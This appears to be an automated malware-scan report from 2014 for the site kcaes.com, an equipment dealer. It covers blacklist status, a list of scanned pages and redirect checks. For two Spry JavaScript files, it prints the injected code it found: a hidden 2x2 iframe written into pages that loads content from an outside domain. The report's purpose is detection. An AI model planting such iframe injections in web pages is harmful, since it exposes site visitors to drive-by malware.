Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kcaes.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kcaes.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kcaes.com/ | 200 OK Content-Length: 8393 Content-Type: text/html | clean |
http://kcaes.com/index.php | 200 OK Content-Length: 8393 Content-Type: text/html | clean |
http://kcaes.com/about-us.php | 200 OK Content-Length: 5421 Content-Type: text/html | clean |
http://kcaes.com/new-equipment.php | 200 OK Content-Length: 3851 Content-Type: text/html | clean |
http://kcaes.com/used-equipment.php | 200 OK Content-Length: 6358 Content-Type: text/html | clean |
http://kcaes.com/financing.php | 200 OK Content-Length: 3596 Content-Type: text/html | clean |
http://kcaes.com/contact-us.php | 200 OK Content-Length: 6816 Content-Type: text/html | clean |
http://kcaes.com/SpryAssets/SpryValidationTextarea.js | 200 OK Content-Length: 37416 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3342412></iframe>');
(function() { if (typeof Spry == "undefined") window.Spry = {}; if (!Spry.Widget) Spry.Widget = {}; Spry.Widget.BrowserSniff = function() { var b = navigator.appName.toString(); var up = navigator.platform.toString(); var ua = navigator.userAgent.toString(); this.mozilla = this.ie = try { this.stopPropagation(ev); this.preventDefault(ev); } catch (e) {} }; Spry.Widget.Utils.stopPropagation = function(ev) { if (ev.stopPropagation) { ev.stopPropagation(); } else { ev.cancelBubble = true; } }; Spry.Widget.Utils.preventDefault = function(ev) { if (ev.preventDefault) { ev.preventDefault(); } else { ev.returnValue = false; } }; })(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=3342412 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3342412> | ||
http://kcaes.com/SpryAssets/SpryValidationTextField.js | 200 OK Content-Length: 75428 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3342412></iframe>');
(function() { if (typeof Spry == "undefined") window.Spry = {}; if (!Spry.Widget) Spry.Widget = {}; Spry.Widget.BrowserSniff = function() { var b = navigator.appName.toString(); var up = navigator.platform.toString(); var ua = navigator.userAgent.toString(); this.mozilla = this.ie = try { this.stopPropagation(ev); this.preventDefault(ev); } catch (e) {} }; Spry.Widget.Utils.stopPropagation = function(ev) { if (ev.stopPropagation) { ev.stopPropagation(); } else { ev.cancelBubble = true; } }; Spry.Widget.Utils.preventDefault = function(ev) { if (ev.preventDefault) { ev.preventDefault(); } else { ev.returnValue = false; } }; })(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=3342412 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3342412> | ||
http://kcaes.com/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://kcaes.com/equipment-image-gallery.php?equipment_id=103 | 200 OK Content-Length: 6070 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js | 200 OK Content-Length: 85925 Content-Type: text/javascript | clean |
http://kcaes.com/admin/scripts/jquery.fancybox-1.3.1/fancybox/jquery.fancybox-1.3.1.pack.js | 200 OK Content-Length: 14731 Content-Type: application/javascript | clean |
http://kcaes.com/admin/uploads/103/1d14eee330773efb804a88dfc8b78591_800.jpg | 200 OK Content-Length: 91875 Content-Type: image/jpeg | clean |
http://kcaes.com/equipment-image-gallery.php?equipment_id=105 | 200 OK Content-Length: 5506 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kcaes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 07:10:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: kcaes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 07:10:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: kcaes.com
Referer: http://www.google.com/search?q=kcaes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kcaes.com
Referer: http://www.google.com/search?q=kcaes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.